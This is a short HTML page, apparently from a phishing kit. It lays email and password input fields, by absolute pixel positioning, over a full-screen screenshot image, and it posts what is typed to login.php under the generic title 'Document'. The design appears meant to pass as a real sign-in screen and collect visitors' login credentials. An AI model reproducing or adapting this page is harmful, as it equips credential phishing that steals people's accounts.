<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Document</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1365px; height:656px; z-index:0"><img src="images/paste839.jpg" alt="" title="" border=0 width=1365 height=656></div>

<form name="form1" method="POST" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="email" style="position:absolute;width:382px;left:853px;top:322px;z-index:2;height: 44px;" required placeholder="Email">
<input name="formtext2" type="password" style="position:absolute;width:382px;left:853px;top:382px;z-index:3;height: 44px;" required placeholder="Password">
<div id="formimage1" style="position:absolute; left:1138px; top:472px; z-index:4"><input type="image" name="formimage1" width="101" height="43" src="images/ofn.JPG"></div>
</form>


</body>
</html>
